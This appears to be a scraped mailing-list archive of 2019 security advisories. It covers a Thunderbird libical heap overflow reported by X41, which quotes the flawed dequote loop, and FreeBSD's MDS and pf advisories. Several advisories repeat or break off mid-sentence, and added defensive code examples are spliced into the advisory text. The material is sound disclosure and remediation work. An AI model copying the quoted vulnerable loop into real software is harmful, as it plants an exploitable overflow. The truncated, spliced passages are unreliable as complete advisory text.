might be used by a remote attacker to crash or gain remote code
execution in the client system.

This issue was initially reported by Brandon Perry here:

https://bugzilla.mozilla.org/show_bug.cgi?id=1281041

and fixed in libical upstream, but was never fixed in Thunderbird.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalparser.c parser_get_next_char()
can be triggered while parsing a calendar attachment containing a
malformed or specially crafted string.
The issue initially manifests as an out-of-bounds read, but we do not
rule out that it could later lead to an out-of-bounds write.
It is expected that an attacker can exploit this vulnerability to
achieve remote code execution.

Proof of Concept
================
A reproducer ical file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-002

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline
========
2016-06-20 Issue reported by Brandon Perry to the vendor
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and IT security consulting and support services are
core competencies of X41.


X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird

2019-06-13 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely when an attacker sends a specially
crafted calendar attachment, and it does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.

This issue was initially reported by Brandon Perry here:

https://bugzilla.mozilla.org/show_bug.cgi?id=1280832

and fixed in libical upstream, but was never fixed in Thunderbird.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalvalue.c
icalmemory_strdup_and_dequote() can be triggered while parsing a
calendar attachment containing a malformed or specially crafted
string.

~~~
static char *icalmemory_strdup_and_dequote(const char *str)
{
    const char *p;
    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
    char *pout = out;
    // ...
    for (p = str; *p != 0; p++) {
        if (*p == '\\') {
            /* steps past the backslash without checking whether the
               next character is the terminating NUL */
            p++;
            // ...
        } else {
            *pout = *p;
        }
    }
~~~

Bounds checking in `icalmemory_strdup_and_dequote()` can be bypassed when
the input `p` ends with a backslash, which enables an attacker to read out
of bounds of the input buffer and write out of bounds of a heap-allocated
output buffer.
The issue manifests in several ways, including out-of-bounds read and
write and null-pointer dereference, and frequently leads to heap corruption.

It is expected that an attacker can exploit this vulnerability to
achieve remote code execution.
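An added example (not libical's or Thunderbird's code) of a dequote routine with the check the loop above lacks: it looks at the character after a backslash before advancing, so a backslash at the very end of the input cannot move the read pointer past the NUL terminator. The escape table and the helper `dequote_matches()` are constructed for this example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Copy str into a new heap buffer, resolving backslash escapes.
 * The vulnerable pattern advances past the backslash unconditionally, so a
 * backslash as the final character steps over the NUL terminator and the loop
 * keeps reading the input and writing the output beyond both buffers.  Here
 * the next character is inspected first; a trailing backslash is kept
 * literally and the loop stops at the terminator.  Every input character
 * yields at most one output character, so strlen(str) + 1 bytes suffice. */
char *strdup_and_dequote_safe(const char *str)
{
    size_t len = strlen(str);
    char *out = malloc(len + 1);
    if (out == NULL)
        return NULL;
    char *pout = out;

    for (const char *p = str; *p != '\0'; p++) {
        if (*p != '\\') {
            *pout++ = *p;
            continue;
        }
        /* Escape sequence: look ahead WITHOUT stepping past a NUL. */
        if (p[1] == '\0') {
            *pout++ = '\\';          /* trailing backslash: keep it, then stop */
            break;
        }
        p++;
        switch (*p) {
        case 'n': case 'N': *pout++ = '\n'; break;
        case 't': case 'T': *pout++ = '\t'; break;
        case 'r': case 'R': *pout++ = '\r'; break;
        default:            *pout++ = *p;   break;  /* \\ \; \, \" and others */
        }
    }
    *pout = '\0';
    return out;
}

/* Constructed helper: dequote `input` and report whether it equals `expected`. */
int dequote_matches(const char *input, const char *expected)
{
    char *got = strdup_and_dequote_safe(input);
    if (got == NULL)
        return 0;
    int ok = strcmp(got, expected) == 0;
    free(got);
    return ok;
}

int main(void)
{
    /* Constructed inputs: an escaped comma, an escaped newline and the
     * edge case the advisory describes, a backslash as the last byte. */
    const char *samples[] = { "a\\,b", "line\\nnext", "tail\\" };
    for (int i = 0; i < 3; i++) {
        char *d = strdup_and_dequote_safe(samples[i]);
        printf("%-12s -> \"%s\" (%zu bytes)\n", samples[i], d, strlen(d));
        free(d);
    }
    return 0;
}
```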

Proof of Concept
================
A reproducer EML file can be found in:

https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline
========
2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and IT security consulting and support services are
core competencies of X41.



FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                          Security Advisory
                                                          The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

0.   Revision history

v1.0   2019-05-14  Initial release.
v1.1   2019-05-15  Fixed date on microcode update package.
v1.2   2019-05-15  Userland startup microcode update details added.
                   Add language specifying which manufacturers are affected.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected.  x86 processors from other
manufacturers (eg, AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to the
system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html.

Mitigation 

FreeBSD Security Advisory FreeBSD-SA-19:07.mds

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                          Security Advisory
                                                          The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

0.   Revision history

v1.0   2019-05-14  Initial release.
v1.1   2019-05-15  Fixed date on microcode update package.
v1.2   2019-05-15  Userland startup microcode update details added.
                   Add language specifying which manufacturers are affected.
v1.3   2019-05-15  Minor quoting nit for the HT disable loader config.
v2.0   2019-05-15  Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected.  x86 processors from other
manufacturers (eg, AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to the
system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***]
Due to an error in the 12.0-RELEASE affecting the i386 architecture, a new
set of patches is being released.  If your 12.0-RELEASE sources are not yet
patched using the initially published patch, then you need to apply the
mds.12.0.patch. If your sources are already updated, or patched with the
patch from the initial advisory, then you need to apply the incremental
patch, named mds.12.0.p4p5.patch

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.

FreeBSD Security Advisory FreeBSD-SA-19:07.mds

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:07.mds                                          Security Advisory
                                                          The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Systems with users or processes in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r now

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the microcode update can be applied at boot time
by adding the following lines to the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

Microcode updates can also be applied while the system is running.  See
cpucontrol(8) for details.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation Configuration

Systems with users, processes, or virtual machines in different trust
domains should disable Hyper-Threading by setting the
machdep.hyperthreading_allowed tunable to 0:

# echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf

To activate the MDS mitigation set the hw.mds_disable sysctl.  The settings
are:

0 - mitigation disabled
1 - VERW instruction (microcode) mitigation enabled
2 - Software sequence mitigation enabled (not recommended)
3 - Automatic VERW or Software selection

Automatic mode uses the V

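The two settings above are usually pushed to a fleet by configuration management rather than typed in by hand. The following is an added example, not code from the FreeBSD advisory or from the FreeBSD project: it writes the tunables idempotently (the advisory's `echo ... >> /boot/loader.conf` appends another copy of the line every time it is run) and audits a snapshot of sysctl values against the advisory's recommendations. The sysctl snapshots in the demo are constructed; on a real host they would come from `sysctl hw.mds_disable machdep.hyperthreading_allowed`. Note that machdep.hyperthreading_allowed is a loader tunable and belongs in /boot/loader.conf, while hw.mds_disable can be set at runtime or in /etc/sysctl.conf.

```python
"""Added example (not from the FreeBSD advisory): apply the SA-19:07.mds
settings idempotently and audit a host's resulting MDS posture."""
import re
from pathlib import Path

# Meaning of the hw.mds_disable values, as listed in the advisory.
MDS_MODES = {
    0: "mitigation disabled",
    1: "VERW instruction (microcode) mitigation",
    2: "software sequence mitigation (not recommended)",
    3: "automatic VERW or software selection",
}


def set_tunable_lines(lines, key, value):
    """Return `lines` with exactly one `key=value` entry: every existing
    assignment to `key` is rewritten (duplicates collapsed), otherwise the
    line is appended.  Pure function so it can be tested without files."""
    assign = re.compile(r"^\s*" + re.escape(key) + r"\s*=")
    new_line = f"{key}={value}"
    out, found = [], False
    for line in lines:
        if assign.match(line):
            if not found:
                out.append(new_line)
            found = True
        else:
            out.append(line)
    if not found:
        out.append(new_line)
    return out


def ensure_tunable(path, key, value):
    """Apply set_tunable_lines() to a loader.conf/sysctl.conf-style file."""
    p = Path(path)
    lines = p.read_text().splitlines() if p.exists() else []
    p.write_text("\n".join(set_tunable_lines(lines, key, value)) + "\n")


def audit_mds(sysctl, multi_tenant=True):
    """Return a list of findings (empty = nothing to do) for one host.

    `sysctl` maps sysctl names to their string values.  `multi_tenant`
    states whether the host runs users, processes or VMs from different
    trust domains, the advisory's condition for disabling Hyper-Threading."""
    findings = []
    mode = int(sysctl.get("hw.mds_disable", "0"))
    if mode == 0:
        findings.append("hw.mds_disable=0: " + MDS_MODES[0])
    elif mode == 2:
        findings.append("hw.mds_disable=2: " + MDS_MODES[2]
                        + "; prefer 1 or 3 with updated microcode")
    if multi_tenant and sysctl.get("machdep.hyperthreading_allowed", "1") != "0":
        findings.append("Hyper-Threading enabled on a multi-tenant host; "
                        "set machdep.hyperthreading_allowed=0 in loader.conf")
    return findings


if __name__ == "__main__":
    # Stand-alone demo on a throwaway file; on FreeBSD point it at
    # /boot/loader.conf (hyperthreading) and /etc/sysctl.conf (hw.mds_disable).
    import os
    import tempfile
    demo = os.path.join(tempfile.mkdtemp(), "loader.conf")
    ensure_tunable(demo, "machdep.hyperthreading_allowed", "0")
    ensure_tunable(demo, "machdep.hyperthreading_allowed", "0")  # no duplicate line
    print(Path(demo).read_text(), end="")
    # Constructed snapshot of an unmitigated host:
    print(audit_mds({"hw.mds_disable": "0", "machdep.hyperthreading_allowed": "1"}))
```

The audit treats hw.mds_disable=1 and 3 as acceptable only on the assumption that the microcode update described above has actually been applied; it does not verify the microcode revision itself.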
FreeBSD Security Advisory FreeBSD-SA-19:05.pf

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:05.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 fragment reassembly panic in pf(4)

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5597

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last
extension header offset from the last received packet instead of from the
first packet.

III. Impact

Malicious IPv6 packets with different IPv6 extensions could cause a kernel
panic or potentially a filtering rule bypass.

IV.  Workaround

Only systems that use the pf(4) firewall with packet scrubbing enabled (the
recommended 'scrub in all' or similar) are affected.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r344706
releng/12.0/                                                      r347591
stable/11/                                                        r344707
releng/11.2/                                                      r347591
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf>

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc>
-BEGIN PGP SIGNATURE-


FreeBSD Security Advisory FreeBSD-SA-19:06.pf

2019-05-15 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=============================================================================
FreeBSD-SA-19:06.pf                                         Security Advisory
                                                          The FreeBSD Project

Topic:          ICMP/ICMP6 packet filter bypass in pf

Category:       contrib
Module:         pf
Announced:      2019-05-14
Credits:        Synacktiv
Affects:        All supported versions of FreeBSD
Corrected:      2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE)
                2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4)
                2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE)
                2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:       CVE-2019-5598

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

pf(4) is an Internet Protocol packet filter originally written for OpenBSD.
In addition to filtering packets, it also has packet normalization
capabilities.

II.  Problem Description

States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in
their payload matching an existing condition.  pf(4) does not check if the
outer ICMP or ICMP6 packet has the same destination IP as the source IP of
the inner protocol packet.
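
The consistency check described above, written stand-alone as an added example; this is not code from the FreeBSD advisory or from pf(4) itself. An ICMP error (destination unreachable, time exceeded, and so on) quotes the header of the datagram that triggered it, so for a genuine error the host the outer packet is addressed to must be the host that sent the quoted datagram: outer destination equals inner source. The packets are constructed inline with documentation-range addresses; the code handles IPv4/ICMP, and the same comparison applies to IPv6/ICMP6.

```python
"""Added example (not pf's code): verify that an ICMP error's outer
destination matches the source of the datagram it quotes, the check whose
absence CVE-2019-5598 describes."""
import socket
import struct

IP_PROTO_ICMP = 1
IP_PROTO_UDP = 17
# ICMP types that carry the offending datagram's IP header in their payload:
# dest unreachable, source quench, redirect, time exceeded, parameter problem.
ICMP_ERROR_TYPES = {3, 4, 5, 11, 12}


def _ipv4_header(src, dst, proto, payload_len):
    """Minimal 20-byte IPv4 header (checksum left zero; a filter verifies it
    separately, this example only looks at addresses)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64,
                       proto, 0, socket.inet_aton(src), socket.inet_aton(dst))


def icmp_error_packet(outer_src, outer_dst, inner_src, inner_dst):
    """Constructed ICMP type 3 (destination unreachable) packet quoting an
    inner UDP datagram from inner_src to inner_dst."""
    inner = _ipv4_header(inner_src, inner_dst, IP_PROTO_UDP, 8) + bytes(8)
    icmp = struct.pack("!BBHI", 3, 1, 0, 0) + inner   # type, code, cksum, unused
    return _ipv4_header(outer_src, outer_dst, IP_PROTO_ICMP, len(icmp)) + icmp


def icmp_error_is_consistent(pkt):
    """True only if `pkt` is an IPv4 ICMP error whose outer destination equals
    the source address of the quoted inner datagram.  Anything truncated,
    not IPv4, not ICMP or not an error type returns False (fail closed)."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return False
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != IP_PROTO_ICMP or len(pkt) < ihl + 8 + 20:
        return False
    if pkt[ihl] not in ICMP_ERROR_TYPES:
        return False
    outer_dst = pkt[16:20]
    inner = pkt[ihl + 8:]          # quoted IP header starts after the 8-byte ICMP header
    if inner[0] >> 4 != 4:
        return False
    inner_src = inner[12:16]
    return outer_dst == inner_src


if __name__ == "__main__":
    # Router 203.0.113.1 tells 192.0.2.10 that its datagram could not be
    # delivered: consistent.
    genuine = icmp_error_packet("203.0.113.1", "192.0.2.10", "192.0.2.10", "198.51.100.5")
    # Same error aimed at 192.0.2.99, which never sent the quoted datagram:
    # this is the shape of packet the advisory says pf let through.
    spoofed = icmp_error_packet("203.0.113.1", "192.0.2.99", "192.0.2.10", "198.51.100.5")
    print("genuine:", icmp_error_is_consistent(genuine))   # True
    print("spoofed:", icmp_error_is_consistent(spoofed))   # False
```

In a stateful filter this comparison sits in front of the state lookup: the inner header is what selects the existing state, and without the outer/inner address check a packet that matches some state on the inner addresses can be delivered to an arbitrary outer destination behind the filter.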

III. Impact

A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter rules
and be passed to a host that would otherwise be unavailable.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Afterwards, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc
# gpg --verify pf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r345377
releng/12.0/                                                      r347593
stable/11/                                                        r345378
releng/11.2/                                                      r347593
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
